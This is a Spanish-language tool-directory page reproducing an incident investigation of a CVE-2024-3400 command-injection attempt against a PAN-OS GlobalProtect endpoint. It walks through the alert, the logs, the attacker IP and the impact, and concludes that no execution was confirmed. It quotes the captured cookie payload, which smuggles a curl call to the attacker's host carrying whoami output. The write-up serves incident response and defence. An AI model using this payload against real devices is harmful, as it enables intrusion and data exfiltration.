Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Investigación de un intento de inyección de comandos PAN-OS CVE-2024-3400, analizando la entrega del payload, el procesamiento interno y la validación de la ejecución basada en evidencia de registros. | Kitploit
Herramientas/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
Análisis de VulnerabilidadesSeguridad WebForensia DigitalInteligencia de AmenazasRespuesta a IncidentesAnálisis de Registros
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

Investigación de un intento de inyección de comandos PAN-OS CVE-2024-3400, analizando la entrega del payload, el procesamiento interno y la validación de la ejecución basada en evidencia de registros.

Ver Repositorio
12hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Read on Medium

Investigando un intento de inyección de comandos en PAN-OS CVE-2024-3400

Resumen

Este proyecto documenta la investigación de un intento de inyección de comandos CVE-2024-3400 dirigido al servicio PAN-OS GlobalProtect.

El objetivo era determinar:

  • si se trata de un ataque real
  • si se produjo la ejecución de comandos
  • si hay evidencia de compromiso

Resumen de la alerta

Se activó una alerta crítica indicando un posible intento de explotación.

  • Objetivo: 172.16.17.139 (PA-Firewall-01)
  • Origen: 144.172.79.92
  • Endpoint: /global-protect/login.esp
  • Método: POST
  • Acción: Permitida

Alert Overview


Payload malicioso

La solicitud contiene una cookie manipulada:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

Payload

Observaciones clave

  • ${IFS} evita el filtrado de espacios
  • whoami intenta obtener la identidad del sistema
  • curl intenta comunicación saliente

Este es un payload de inyección de comandos


Evidencia del servidor web

Los registros de Nginx confirman que la solicitud llegó al servidor:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Nginx Logs

La solicitud maliciosa fue aceptada y procesada.


Procesamiento interno

Los registros del sistema muestran que el payload alcanzó la lógica interna:

Processing Logs

Hallazgo clave

  • el payload fue incrustado en un comando interno (dt_curl)
  • se intentó una solicitud saliente
  • la cadena de ejecución alcanzó componentes internos

Sin embargo:

Falló la resolución DNS → el intento de salida falló


Infraestructura del atacante

La IP atacante:

  • 144.172.79.92
  • marcada como maliciosa
  • asociada con un proveedor de alojamiento

Attacker IP

Esto confirma un origen atacante externo.


Línea de tiempo de la red

Varias IPs interactuaron con el sistema antes del ataque:

Timeline

Solo 144.172.79.92 está directamente relacionada con la explotación.


Evaluación de impacto

Confirmado

  • intento de explotación dirigido a CVE-2024-3400
  • payload malicioso entregado
  • solicitud procesada por el servidor
  • payload alcanzó el procesamiento interno
  • se desencadenó un intento de salida

No confirmado

  • ejecución de comandos del sistema
  • salida del comando
  • exfiltración de datos
  • reverse shell
  • persistencia
  • movimiento lateral

Conclusión

Este fue un intento real de inyección de comandos.

El atacante logró:

  • entregar una solicitud maliciosa
  • inyectar un payload
  • desencadenar el procesamiento interno

Sin embargo:

no hay ejecución confirmada ni compromiso del sistema


Clasificación final

Intento de inyección de comandos
Payload procesado - Sin ejecución ni impacto confirmados

Descargar herramienta